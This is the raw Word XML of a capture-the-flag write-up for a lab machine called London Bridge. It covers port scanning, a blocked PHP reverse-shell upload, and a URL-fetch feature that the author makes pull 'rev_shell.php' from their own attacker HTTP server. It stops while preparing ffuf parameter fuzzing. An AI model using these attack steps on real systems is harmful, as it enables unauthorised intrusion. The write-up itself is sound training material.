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F6670" w14:textId="17911BA1" w:rsidR="00D60B3C" w:rsidRPr="00ED5B8A" w:rsidRDefault="004534BB" w:rsidP="00ED5B8A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004534BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="004534BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>London</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="004534BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bridge</w:t>
      </w:r>
      <w:r w:rsidR="00ED5B8A" w:rsidRPr="00ED5B8A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>_Solution_Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B50EE36" w14:textId="5F5515FC" w:rsidR="00ED5B8A" w:rsidRPr="00ED5B8A" w:rsidRDefault="00ED5B8A" w:rsidP="00ED5B8A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5B8A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Written by: Yuval Quina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58096BE2" w14:textId="29338F94" w:rsidR="00ED5B8A" w:rsidRDefault="00ED5B8A" w:rsidP="00ED5B8A">
      <w:r>
        <w:t>I started this CTF by performing a Nmap tcp open ports and services scan over the target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B39A4F4" w14:textId="0E68398D" w:rsidR="00C15985" w:rsidRDefault="00F148C2" w:rsidP="00ED5B8A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F74A1D3" wp14:editId="1BDEB6AC">
            <wp:extent cx="5706533" cy="2381878"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1688855691"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5691" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5716704" cy="2386123"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="498CE54F" w14:textId="58933E4D" w:rsidR="00F148C2" w:rsidRDefault="00F148C2" w:rsidP="00ED5B8A">
      <w:r>
        <w:t>I saw that port 8080 is open, so I accessed the target’s website via the browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606C892F" w14:textId="09E003F4" w:rsidR="00FD5FF9" w:rsidRDefault="00646AE8" w:rsidP="00ED5B8A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72045B1D" wp14:editId="322DC67F">
            <wp:extent cx="4673600" cy="3939963"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1919192847"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2847" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4674773" cy="3940952"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19321F30" w14:textId="29A75565" w:rsidR="00646AE8" w:rsidRDefault="00646AE8" w:rsidP="00ED5B8A">
      <w:r>
        <w:t>I checked the inspector as well as the robots.txt and found nothing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722333BF" w14:textId="77777777" w:rsidR="00F34000" w:rsidRDefault="00F34000" w:rsidP="00ED5B8A">
      <w:r>
        <w:t>I checked the pages and found this page at the “Gallery” section:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4155A46E" w14:textId="7BD9192F" w:rsidR="00646AE8" w:rsidRDefault="004A52CE" w:rsidP="00ED5B8A">
      <w:r w:rsidRPr="004A52CE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52A81590" wp14:editId="30099EEB">
            <wp:extent cx="5147733" cy="2887088"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="663328397" name="תמונה 1" descr="תמונה שמכילה טקסט, שמיים, צילום מסך, רכ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28397" name="תמונה 1" descr="תמונה שמכילה טקסט, שמיים, צילום מסך, רכב&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5151364" cy="2889124"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F34000">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC09847" w14:textId="1A91B6B8" w:rsidR="004A52CE" w:rsidRDefault="004A52CE" w:rsidP="00ED5B8A">
      <w:r>
        <w:t>At this point, I tried to upload</w:t>
      </w:r>
      <w:r w:rsidR="00A647B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00DC18F6">
        <w:t>his rev shell php file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC1C581" w14:textId="33EA9E19" w:rsidR="00DC18F6" w:rsidRDefault="00A7244C" w:rsidP="00ED5B8A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ABFE61F" wp14:editId="45C8DF30">
            <wp:extent cx="4262966" cy="1874576"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="1011417063" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן,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7063" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן, תוכנה&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4268102" cy="1876835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6102C67E" w14:textId="1D908B48" w:rsidR="00A7244C" w:rsidRDefault="00C3383C" w:rsidP="00ED5B8A">
      <w:r>
        <w:t>But it failed according to this message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E20F6" w14:textId="46C87B31" w:rsidR="00C3383C" w:rsidRDefault="0028406D" w:rsidP="00ED5B8A">
      <w:r w:rsidRPr="0028406D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="142AEAFC" wp14:editId="13A9168E">
            <wp:extent cx="3798899" cy="1169771"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1628176267" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, תוכנה,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76267" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, תוכנה, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3798899" cy="1169771"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EBC983" w14:textId="16B1946F" w:rsidR="0028406D" w:rsidRDefault="007552F8" w:rsidP="00ED5B8A">
      <w:r>
        <w:t>After this fail, I opened the inspector and found this message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285ED0EC" w14:textId="23BCFD62" w:rsidR="007552F8" w:rsidRDefault="007552F8" w:rsidP="00ED5B8A">
      <w:r w:rsidRPr="007552F8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24517118" wp14:editId="636C6D0C">
            <wp:extent cx="2636748" cy="502964"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10655643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64318" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2636748" cy="502964"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4678E1B8" w14:textId="4B68E166" w:rsidR="004D66D2" w:rsidRDefault="009328FC" w:rsidP="00CE581D">
      <w:r>
        <w:t>Now, I knew that I can somehow upload images (</w:t>
      </w:r>
      <w:r w:rsidR="000E6E3E">
        <w:t>including the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rev shell file) using links in </w:t>
      </w:r>
      <w:r w:rsidR="00C24DAE">
        <w:t>some way</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004717BD">
        <w:t xml:space="preserve"> I tried to</w:t>
      </w:r>
      <w:r w:rsidR="007B28C4">
        <w:t xml:space="preserve"> upload </w:t>
      </w:r>
      <w:r w:rsidR="00112516">
        <w:t>a regular image, and it worked so I found that there is a file type filter system</w:t>
      </w:r>
      <w:r w:rsidR="00CE581D">
        <w:t xml:space="preserve">. I also tried using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE581D">
        <w:t>burpsuit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CE581D">
        <w:t xml:space="preserve"> to add to the file content the png magic </w:t>
      </w:r>
      <w:r w:rsidR="00E16868">
        <w:t>number,</w:t>
      </w:r>
      <w:r w:rsidR="00CE581D">
        <w:t xml:space="preserve"> but it still didn’t work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53379F0F" w14:textId="77777777" w:rsidR="00A3598F" w:rsidRDefault="00A3598F" w:rsidP="00CE581D"/>
    <w:p w14:paraId="33FA2455" w14:textId="77777777" w:rsidR="00A3598F" w:rsidRDefault="00A3598F" w:rsidP="00CE581D"/>
    <w:p w14:paraId="183C2050" w14:textId="77777777" w:rsidR="00A3598F" w:rsidRDefault="00A3598F" w:rsidP="00CE581D"/>
    <w:p w14:paraId="67175AED" w14:textId="77777777" w:rsidR="00A3598F" w:rsidRDefault="00A3598F" w:rsidP="00CE581D"/>
    <w:p w14:paraId="7D9499AD" w14:textId="11E53BA2" w:rsidR="0069388D" w:rsidRDefault="0069388D" w:rsidP="00CE581D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Then, I moved to enumerate directories using </w:t>
      </w:r>
      <w:r w:rsidR="00A3598F">
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. I found </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> new directory named “</w:t>
      </w:r>
      <w:r w:rsidR="00C32775" w:rsidRPr="00C32775">
        <w:t>/dejaview</w:t>
      </w:r>
      <w:r w:rsidR="00C32775">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00A3598F">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5151B5A7" w14:textId="519814E9" w:rsidR="00C32775" w:rsidRDefault="00C32775" w:rsidP="00CE581D">
      <w:r w:rsidRPr="00C32775">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5267210F" wp14:editId="457044DB">
            <wp:extent cx="6409266" cy="2598257"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1262715204" name="תמונה 1"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15204" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, תוכנה, תכונות מולטימדיה&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6414664" cy="2600445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE5DCEC" w14:textId="4E3E96F7" w:rsidR="00CE581D" w:rsidRDefault="008111E6" w:rsidP="006D362B">
      <w:r>
        <w:t>This is the page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D049706" w14:textId="00AD5A44" w:rsidR="009328FC" w:rsidRDefault="006D362B" w:rsidP="00ED5B8A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="156C8433" wp14:editId="38E7F387">
            <wp:extent cx="3609837" cy="2277534"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1217930456" name="תמונה 1"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30456" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, תוכנה, תכונות מולטימדיה&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3613394" cy="2279778"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B8A8B1" w14:textId="6FD34A07" w:rsidR="00787A23" w:rsidRDefault="00972F0E" w:rsidP="00787A23">
      <w:r>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00403863">
        <w:t xml:space="preserve">tried to give a URL for an image </w:t>
      </w:r>
      <w:r w:rsidR="00787A23">
        <w:t>from the gallery, and it worked:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B7B20D" w14:textId="00448BE2" w:rsidR="00787A23" w:rsidRDefault="00787A23" w:rsidP="00787A23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B70C4E" wp14:editId="7BD49DF8">
            <wp:extent cx="3090151" cy="2730500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2065505132" name="תמונה 1" descr="תמונה שמכילה הנעלה, לבוש, ענן, אד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5132" name="תמונה 1" descr="תמונה שמכילה הנעלה, לבוש, ענן, אדם&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3093137" cy="2733139"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="047653DE" w14:textId="1C7D251B" w:rsidR="00787A23" w:rsidRDefault="00787A23" w:rsidP="00272BBC">
      <w:r>
        <w:t xml:space="preserve">Now, I </w:t>
      </w:r>
      <w:r w:rsidR="008A2C6D">
        <w:t xml:space="preserve">tried to give </w:t>
      </w:r>
      <w:r w:rsidR="00272BBC">
        <w:t>an URL</w:t>
      </w:r>
      <w:r w:rsidR="008A2C6D">
        <w:t xml:space="preserve"> from another source on the </w:t>
      </w:r>
      <w:r w:rsidR="00230B84">
        <w:t>internet,</w:t>
      </w:r>
      <w:r w:rsidR="008A2C6D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00255891">
        <w:t>and it also worked!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED8DEF5" w14:textId="1481B1AB" w:rsidR="002C558A" w:rsidRDefault="00515E58" w:rsidP="00787A23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E89B93F" wp14:editId="43F36323">
            <wp:extent cx="1627236" cy="2548466"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="532896258" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, סרטים מצוירים,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96258" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, סרטים מצוירים, איור&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1630673" cy="2553848"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5AF480" w14:textId="77777777" w:rsidR="004571C3" w:rsidRDefault="00515E58" w:rsidP="00787A23">
      <w:r>
        <w:t xml:space="preserve">Now, I </w:t>
      </w:r>
      <w:r w:rsidR="005F528F">
        <w:t xml:space="preserve">established a basic python http </w:t>
      </w:r>
      <w:r w:rsidR="004E02BE">
        <w:t xml:space="preserve">server on my machine so I can share the rev shell </w:t>
      </w:r>
      <w:r w:rsidR="004571C3">
        <w:t>file to the website:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E93C97" w14:textId="77777777" w:rsidR="00031B9D" w:rsidRDefault="00031B9D" w:rsidP="00787A23">
      <w:r w:rsidRPr="00031B9D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06395D52" wp14:editId="61BDBC73">
            <wp:extent cx="3703641" cy="369602"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5131472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7269" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3703641" cy="369602"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D927BC" w14:textId="52BECA41" w:rsidR="00515E58" w:rsidRDefault="00031B9D" w:rsidP="00787A23">
      <w:r>
        <w:t xml:space="preserve">After checking the server, I called the file from the website using this URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00F37F9B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.9.3.192:8000/rev_shell.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18C273BA" w14:textId="17F95DC9" w:rsidR="00AC4AEE" w:rsidRDefault="00AC4AEE" w:rsidP="00787A23">
      <w:r>
        <w:t>and the server got the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16955BEB" w14:textId="3E6FE50C" w:rsidR="00031B9D" w:rsidRDefault="00AC4AEE" w:rsidP="00787A23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65B2CD9B" wp14:editId="1EAE1B6F">
            <wp:extent cx="7556500" cy="390525"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="3147942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94220" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7556500" cy="390525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="239129CE" w14:textId="2082B07F" w:rsidR="00133044" w:rsidRDefault="00336297" w:rsidP="00787A23">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I opened Burpsuite again and found that the packet contains the parameter “image_url” which indicate the file’s url so maybe there is another </w:t>
      </w:r>
      <w:r w:rsidR="00332C78">
        <w:t>parameter according to the thm’s hint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46F64283" wp14:editId="4A9753EB">
            <wp:extent cx="6074833" cy="2741843"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1143280123"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80123" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6081738" cy="2744960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C7E8FB" w14:textId="068E6836" w:rsidR="00CB4849" w:rsidRDefault="00D25AD0" w:rsidP="00787A23">
      <w:r>
        <w:t xml:space="preserve">Now, I </w:t>
      </w:r>
      <w:r w:rsidR="000F6400">
        <w:t xml:space="preserve">wanted to bruteforce parameters names </w:t>
      </w:r>
      <w:r w:rsidR="00EB79C0">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="00AD0C68">
        <w:t xml:space="preserve">“FFUF” </w:t>
      </w:r>
      <w:r w:rsidR="00EC3AD2">
        <w:t>in order to discover additional one</w:t>
      </w:r>
      <w:r w:rsidR="0045140D">
        <w:t xml:space="preserve">s that will enable me to do </w:t>
      </w:r>
      <w:r w:rsidR="006860D1">
        <w:t>more operations</w:t>
      </w:r>
      <w:r w:rsidR="00B44702">
        <w:t xml:space="preserve"> than just see </w:t>
      </w:r>
      <w:r w:rsidR="007B0FE3">
        <w:t xml:space="preserve">some </w:t>
      </w:r>
      <w:r w:rsidR="00B44702">
        <w:t>images</w:t>
      </w:r>
      <w:r w:rsidR="0045140D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B91B08" w14:textId="77777777" w:rsidR="004A6C2F" w:rsidRDefault="004A6C2F" w:rsidP="00787A23"/>
    <w:p w14:paraId="4D9EF396" w14:textId="77777777" w:rsidR="004A6C2F" w:rsidRDefault="004A6C2F" w:rsidP="00787A23"/>
    <w:p w14:paraId="4ECE6FB6" w14:textId="77777777" w:rsidR="004A6C2F" w:rsidRDefault="004A6C2F" w:rsidP="00787A23"/>
    <w:p w14:paraId="093E31F6" w14:textId="77777777" w:rsidR="004A6C2F" w:rsidRDefault="004A6C2F" w:rsidP="00787A23"/>
    <w:p w14:paraId="5D5EC5A3" w14:textId="5A07C7EC" w:rsidR="004A6C2F" w:rsidRDefault="0045140D" w:rsidP="009A2520">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A6C2F">
        <w:t>But before I executed the attack, I saved the packet in a .ffuf file and changed the parameter name to “FUZZ”</w:t>
      </w:r>
      <w:r w:rsidR="009A2520">
        <w:t xml:space="preserve">. I addition, I changed the “Connection” parameter from “keep-alive” to “close” because </w:t>
      </w:r>
      <w:r w:rsidR="009A2520" w:rsidRPr="009A2520">
        <w:t xml:space="preserve">the server </w:t>
      </w:r>
      <w:r w:rsidR="00D811F6" w:rsidRPr="009A2520">
        <w:t>has</w:t>
      </w:r>
      <w:r w:rsidR="009A2520" w:rsidRPr="009A2520">
        <w:t xml:space="preserve"> limits on how many requests can reuse a single connection (keep-alive means that keep the communication open for more packets after this one) and if ffuf sends too many requests on the same connection, the server may drop the parameter or not noticing them.</w:t>
      </w:r>
    </w:p>
